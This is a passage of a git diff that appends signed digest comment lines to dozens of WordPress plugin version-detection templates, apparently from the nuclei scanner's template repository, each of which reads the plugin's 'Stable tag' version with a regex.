b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206e780a16126f9f43592d550e52a8eb7eaed53f8a98a986edba66aa92b02e3b9b022100eb9b180a935869cd40fa26f1c708787969b70b8f50bd5497337970fa35507f97:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 02ceb224d1..64ec4d3c59 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d28b207cf3fc9424019480527fb8ff919c41a6d374483392ce1aeea10b7d16bf022019a214f0de7fcb5d692bef02d7145c764fe44235d596e28cd72d4a220e42ce30:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 367d587ce2..4fc8928424 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a49bf9c11bb4d02e87918909aa06c5decd148f64f415c61965ca5430bd359be00221009e30a15356ef267087edecbf84b7add8133a16808905cf82a64291309fdd6480:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index feed730ee0..10714c55c2 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022034a119cfe0bacb0ed488c3e60106439242fd4d7625bfd6c170973bd2a9c06f2a0220083874feb12afd52670ca093350dae4c9ad6f98e6da3484dc8dbbca826e285a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index 9b2841e7ca..ad8d521217 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e963f7bdae29ff13464d2c8a5028c7ed4d8b63709739ac33461760dee4acef8002205d4046947b24660697e447ddce947c4756628c45883b13cca38829ddbbdfc2a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 42be14c5df..0ecfdff6d1 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e6fc045d4684f2dad2714253358455631ca5b6a9e14757ec18529d0214a7a6a1022100e861870b0d1cd207a82b434fdb93cbf56ad237f54184500af42e3cc78db048bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 4e0cd86c3f..7ea1d9b3df 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c6cf227382940b5b666d68a8a46a1c58ae691db1d9d25a88863837ef6acaaf4c022038fa14e06b4234b2e318b3cb9d4f21b60415cab490468ad9c2d657f9a210501e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 59eadc5e6e..4a6ec169a0 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100df3da4544cd710227e0f280f86e481734adce69e5accfedbea9dbc54539531e3022100c35420ed5a0f819e6cc75b15dddbff8ce7c2feeb3f59148606f30ee91b048729:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 41f7a0075e..45f93f5b39 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100df9cf2e61ea3fe77340086a8b66b9e0f77b9f508c65365690921dbac2b7877cc022100bbaf949b6c9ed5e00fa8a5081ef62b8151f9d1e5fc8a8fa9d87983404656bd4b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 7e35a3fb4f..b68a177fd2 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220300e6bb539dcffc109522057f2a3b40531ff80ae015efa7b151253f3c74102ce022100c522cafd8d091b031c81b569fbb981b790db3d58e9b7a5ca5e31c0fb8ec80d3f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index 18c2a7586e..812ee32444 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220468fa266edea85db7a70ab0b7c5d86f26b57edab981cf57e66eb73f043c08d0e022100d74306187c73e31b135b2cc47874e111f004f575825cdadcf36aae575734be0b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 6bc2aa78f9..c156208109 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100851a7260a4c6753991ffbcb33a1431e0ce4b8907b957a26aaa1f1cf3052b6c3502205c344d14979d829c8553ce4d28542717a74e46a07c0f0daf35499d5e484d784b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index a43d3352a2..946f1bf644 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f4fc2c5f24d72168f55a31cff8d8b9594ad7663cd3bc421fbcb93c3476c6caea022100dea326751adb4e6d3abe894e3d79bda4bec7bafdc83683f15ab10ddede0ec9f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index e7db9944e4..40c1524b3c 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022036db9591e29a535ef04f3548da895cc45836f88a8a3195700ad91fc1064025d202201b3911825886b8f2f690a2287a9b6ccc2197c1ee3dabcfc4bce6387cd0584789:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 268bd7b9df..4b81e74e7b 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210093d462a0b147b0bab5152fc32b9aae1d168457a3dae551d0a1a5dee91498567002204357fdc754e3b8c436670a58862b3add8a5b44ca505e8201596c464dd840c3b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index d7fb2209d1..79f301b983 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100be3ee4d35774f7e10c0db31f63130077110f5a1ea7420f8239e413519b052b23022100d546b60bee135974e4b504a60ea12c38d988b9fffe19f3f17993b35b7daa09ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index a1641d4632..8878deeccf 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022030d115c65d797474c35d12372a54a1e110a625c201a92e2f81c813d67d07c06102206c06db3210136e6e2d9687d520e571575f901251829009fef697d42afa803662:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 3b6542683c..e96dc2f0e4 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c8210ce244cdb635b2ab15c81d78ddccf7582f992312bf1cc561880ea0b09aaf02203650ff85bccd575132454977b02b05bc824b2a7a15185c083619cc9b2466af6e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 969c280ee1..49a933db44 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022015892a496e91c25c5b63fad21778b6ce754f5f74e2a0a6a05f10b3459b542104022030ef6d4dca14ed222448fb059e51853a268d20a893c637e1a7a9fd94870b3eee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 1c97c422e4..1b4d8330f8 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204e972da5a44d8ddac8283c06e402720a01ed2dbe70f546e83dc5a183d7be29cb022075a929fa441691cea6567e8e2a9dfc0e5465c0faf92be5a2e4877f5337794870:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 7d861cf06a..2711a7b035 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220356c502cb16c811005a6dd7aa3b5c7ddaa668e0b714c963f3dc8e6412c4b5c8e0221008eda17e4638752552407f8161cc9068a9d9b18a89d48b077c6b1a3230ac283b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 00eb1e2dfc..1cf614018c 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ebdc6fd7d6759f4e5afe78142e0538dfe72c1cbf7d14750ca0bfd37a479845e80220740eda6c00f92e9f811e9cfecba04bbce9bc59a31eb8d4d9981a68b160605f83:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index f089ee37d3..1bf755bdb3 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207d268a730484c1521b8e66e1f873ae965f0d2114fbf47a7a3bea2eca057c6fd702201368a370820cfd942b73b574979ed0500982c2980c1e8cabcec343654df32ef7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 492d66db68..bfefbc5e4a 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100fd2b35ea721f4780a2364ed7190d7a13cd9ccbdaa5342f3626fa9602c5f1330d022006931f04038baf75adf342cb646a12e64e611bfc68465ad2e42dcf482d1df652:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index f8903fa3db..7d6ed18c6f 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022078c3914a743ac865a8c462b16de57e17c01e8061e06b4cae97e73e8598b2200d022100ee67e8cdad74d94ec1f9de938f5003d1d6f7e7180c7fa9d2b58d8be860c8fb39:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index ae2451ca38..1d0dc972bb 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220659854d9d453b597e99ec536856584a5e85fc39e1e889d50002e648db9668c0202200718206aec00f72faa78fd76491a2a2e36b85c1cdddbbf171296015d66c8c9ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index dcc61d1255..6566345e24 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206f1075cc0ff6de006d85bcb22bc50986ec5cbf4a7830bf499e3ce841f4813d1202210090b7e06fac88e921102119b09e6b51c80ebda0e5c1eca3d3d83596ebcd236dc6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index d1d2c1c1d0..03e78085f7 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220489942a3945e95f1cf17a5d65b3265298271036f676070d5b7e6c8f46e518b3c0221009490c2192ccf11447d3e390baeb83a06e6aa10cdf609074db2721be1f23e125b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 5f5e8afed5..4f5b439488 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220076d9421b4dcb80b66d95bd767be3dbcebd10b483115ac4f7ed1f242f6b50194022100f5fadce73ebe166abbf6b34c2323369d2f3f0e5e6315aac5b51e419e5584ea57:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index d15634bb2b..8f20bd8668 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100cb3cff15f2ad70357975c3e69ac11e909da71947e7f4dab930d0086fc2342134022100f1ad6363724a6b8751b59cb012b5ed516d71936bf89da9f6ca6aa0076d553548:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 7da04be5d3..2dbbedaf2d 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210097972e736ed11b4f1d3900e3f75cb509cdfd08b5347ec9c4d40ecc369b20956b022071cb27db3fc347d4e524963675a81526958b3aa1db575b9cd6acaa9f113e7c26:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index a79253cec5..3e6438faac 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d3d5b40215f3ef92213f39022dbed512d7cccc2e43276bb09c1ff1e0f58b37f2022011692210364c52e3aa9eab1eaeae702a24b6141cdcd6e77578c95847ee7e5243:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 77fc04a220..5c77d6cdff 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d47ce1043936333554c3acdbeb9d1778cd652227b4af3a04c9348eb56b967a3002204237c82cf384e90ab6a10c094249b814d45ff894f120c01662d19ac2f2ea011e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 733f9ee453..41d35d2130 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022060bb4d68e4124c13cf78c83ce2659074302baca648fac41dc64cb3aba884fc150221009d9461ffd175c8320f753a52d0b4f1d93cffd0112b97b63223a5676d4bf8f25c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index 0af08f0ac0..ade751e8be 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008e45d103e4fde972e1b81ee38482599e5eb76a819a1300a545852ee49870f52a02200cbc05cc0319c9ebad9a45aec4022fde268af05606dae3b9173dd54fcfe1292e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index 1e4c77fbca..19327f3ddc 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c8261cb9c3743049d0da88307088d0969ce381d21a75e78172cff9226730ca99022100f8f4bd4f6ef1699cf1a3871b912d5955e6ad9e60573bce9abd6ce1f3ad3a5acb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 295e3fe82d..c600b99f19 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022036c55ea25525e822d87d3467d3bbe3b6244024608aba8fdabdfd929d88f29d8a0221008814eec272edcffa919ee3548436fdb0f7e3bb1359ee1afe2894300187b686b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 862f73201f..93f54ad182 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008fef2355754f039f5165cc9ae9f97e1784e37dce24d7564d03b48100a23eecc4022100a9223430dcf8bcfc173a7ab9fe0052d688ef22cdaffea597f64b85c374cd0e50:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 711b64f9d0..ddb7fafc07 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202447020bab4e2790bba359e76f33cc5b7fb71e66a1a1432f2b456739d1571e510221009a37b946dde63fe156c6cda837dfc973f5e4927d5984076af0565ebc4031a73f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 58ddcfab78..b961829045 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100965480ce85db1e228ed4b89079178211e0018ca1962e4b84abcf66fbd8444f77022100898127aaa95052de916a7ac2cc6b06667a3d0a886a79b69725a1c18b5187e8f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 305d74e8ea..913589dd20 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200c42c60b14f158c4a0628b649184af2145a8a561ae19aa0a43ab92d2e88bc4ec02205afbd74e9291662f50483d5f33428a0c371f1a4c7e5c9cc20c6204c99ab5e680:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 668162fc4e..ab11a4ddad 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220482f9fe93de822ecbcd80dd11d6889f131e62c5dbe59fe80965edf710bf7ea57022024e56a288abaec85b5e78723389eab047c92d6a3e556fc8d9ad0058e4107c587:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 4f99876557..9167acb6e0 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022053f56c856672cd5437fe190f8ddf3ac6ca4ccdabf883b5c12550b373557ae61802205810fcf18dabc01c83d39c68b5c3ad7d0f26c33e6de5ada8b5b3a5ac0df28644:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index a0d2554492..9b6bb7b53f 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100bcd575f4b04e2b4a7bcdc732fb3c108e53188b528e96588d1da6a76fc51307d8022100d5d0548d4ba35eb1ec6a8eed7cc7451e3704eb4e002ffe95a90fea0fed96c55c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 4e5046273d..22612c6cc3 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d9d0e671b444e7fbcc505de73ce2467c0ab101ee6e7a24d5944532728762e9f2022100ced0aeb1462151d2f56729b99777fc98adba666736482172c5c73acc91de3899:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index f44cee7980..fb1903d50b 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022042bcaf90a40ae83384580dba1f0df23ac02684b1f996ee31996cf9405443f4a1022100d1ae499f18da448848707a9421be1addfc2e60afe7e4a298817a9b8c915972bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 39130db767..0e878ce214 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f8387e2170e6eb8a34525c255614efbef585b01de52f74ab6866d0998397bf54022100d230c0bc05100968e58a019f7b62451294c56da10ec1da5e1fe05080dd8e03d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 39c497073c..2b6408c86c 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b080daf0928d86ebc3a68599e70daa8ef44fdba3a827f38779e7484eb4f8c61e0220033050eab5704bcd4ebd82d5506f09a92992b4ceb635ab23e3ca24a949856693:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git 